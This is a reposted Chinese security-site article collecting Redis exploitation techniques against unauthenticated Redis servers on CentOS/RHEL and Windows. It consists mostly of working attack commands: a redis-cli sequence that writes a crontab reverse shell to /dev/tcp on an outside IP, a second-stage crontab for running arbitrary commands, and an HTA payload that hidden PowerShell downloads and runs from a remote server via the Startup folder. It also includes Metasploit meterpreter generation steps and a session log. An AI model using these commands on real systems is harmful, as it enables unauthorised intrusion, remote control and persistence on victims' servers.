Web安全
首页 > 安全文摘 > Web安全> 正文

redis利用姿势收集

redis的exploit,完全不需要flushall破坏数据场景,redis-cli set 1 ‘ringzero’,这样可以控制第一条记录,就能保证你的内容始终保持在最前面;测试环境:Cent

作者:silence来源:wooyun|2016-08-03 21:14:59

redis的exploit,完全不需要flushall破坏数据场景,redis-cli set 1 ‘ringzero’,这样可以控制第一条记录,就能保证你的内容始终保持在最前面;

测试环境:CentOS,RHEL

# 利用crontab反弹shell

redis-cli flushall 
echo -e "\n\n*/1 * * * * /bin/bash -i >& /dev/tcp/114.114.114.114/53 0>&1\n\n"|redis-cli -x set 1 
redis-cli config set dir /var/spool/cron/ 
redis-cli config set dbfilename root 
redis-cli save
# 利用crontab创建文件 /tmp/888

redis-cli flushall # 为了方便测试 
redis-cli set test 'test' 
redis-cli set my 'mymymymymymymymymymymymy' 
redis-cli set word 'wordwordwordwordwordword' 
redis-cli set hello 'ringzero' 
redis-cli set word1 'word1word1word1word1word1word1' 
echo -e "\n\n*/1 * * * * /bin/touch /tmp/888\n\n"|redis-cli -x set 1 
redis-cli config set dir /var/spool/cron/ 
redis-cli config set dbfilename root 
redis-cli save
redis-cli flushall 
echo -e "\n\n*/1 * * * * /bin/touch /tmp/888\n\n"|redis-cli -x set 1 
redis-cli config set dir /var/spool/cron/ 
redis-cli config set dbfilename root 
redis-cli save
# 二次改写crontab

redis-cli flushall 
redis-cli set 2 ';a=`redis-cli get c`;' 
redis-cli set 1 'id;redis-cli set r `$a`;#' 
redis-cli config set dir /tmp/ 
redis-cli config set dbfilename w 
redis-cli save 
redis-cli set c whoami
# 利用第一步的写crontab步骤,完成下面的命令

echo " " > /tmp/zz 
cat /tmp/w >> /tmp/zz 
/bin/sh /tmp/zz 
redis-cli get r
控制 /var/spool/cron/root 和 /tmp/zz

# 最终实现,每10秒从redis的c变量读入要执行的命令,再将执行结果写入变量r

* * * * * sleep 10;/bin/sh /tmp/zz
windows利用方式(转自90sec)

redis 官方未发布windows版本,但是野外存在redis/win版本。

在测试时发现一windows版本redis,遂开始搞。

直接上利用,基于msf:

root@weisuo.org:~# cat hta-psh.txt 
 <scRipt language="VBscRipT">CreateObject("WscrIpt.SheLL").Run "powershell -w hidden IEX (New-ObjEct System.Net.Webclient).DownloadString('http://119.91.129.12:8080/1.ps1')"</scRipt>
[url=mailto:root@weisuo.org]root@weisuo.org[/url]:~#  cat hta-psh.txt |redis-cli -x -h 192.168.138.27 set a
OK
hta-psh.txt 对一些字符串进行变通,如不,在写入时会导致字符串丢失。

#msfconsole 
use payload/windows/meterpreter/reverse_tcp
generate -t hta-psh -f /var/www/1.ps1
#之后起个handle,略
修改1.ps1,文件内容大概如下:

$command=”powershell -nop -w hidden -e xxxxxxxxxxxxxxxx”;iex $command;$command2=”taskkill /im mshta.exe”;iex $command2;

最后写入文件,等待管理员登陆

oot@weisuo.org:~# redis-cli -h 192.168.138.27
redis 192.168.138.27:6379> CONFIG GET dir
1) "dir"
2) "C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup"
redis 192.168.138.27:6379> config get dbfilename
1) "dbfilename"
2) "2.hta"
redis 192.168.138.27:6379> save
OK
redis 192.168.138.27:6379>[/p][p=20, null, left]
 

msf exploit(handler) > rexploit -j -z
[*] Stopping existing job...
[*] Reloading module...
[*] Exploit running as background job.
 
[*] Started reverse TCP handler on 119.91.151.22:80
msf exploit(handler) > [*] Starting the payload handler...
[*] Sending stage (957999 bytes) to 60.111.27.14
[*] Meterpreter session 4 opened (119.91.151.22:80 -> 60.191.37.34:56301) at 2016-06-06 11:06:00 -0400
[*] Session ID 4 (119.91.151.22:80 -> 60.111.27.14:56301) processing AutoRunScript 'migrate -f'
[*] Current server process: powershell.exe (4896)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3768
[+] Successfully migrated to process

【责任编辑:silence 】

分享:

安全快讯+更多

湖南青年杨某沉迷“黑客”技术,利用国外网络攻击网站的攻击服务,花钱请人开发成软件后,通过QQ群推销,并发展代理商销售,8个月内获利数万元。
6月13日,由赛可达实验室、国家计算机病毒应急处理中心、国家网络与信息系统安全产品质量监督检验中心、首都创新大联盟共同举办的第五届中国网络安全大会(NSC2017)在北京国家会议中心隆重举行。
《中华人民共和国网络安全法》已于6月1日正式实施并成为我国网络空间法治建设的重要里程碑,在确立安全在整个信息系统建设中的核心和关键地位的同时,也对保护公众个人信息安全起到了积极作用。
Shadow Brokers(影子经纪人)回应想哭勒索蠕虫事件,同时公布了一个月度销售计划,称自6月开始,每个月都有高危0day、黑客工具、机密数据售卖。
勒索病毒“WannaCry”(永恒之蓝)在全球范围内的爆发,恐怕是这几天影响力最大的公共安全事件了。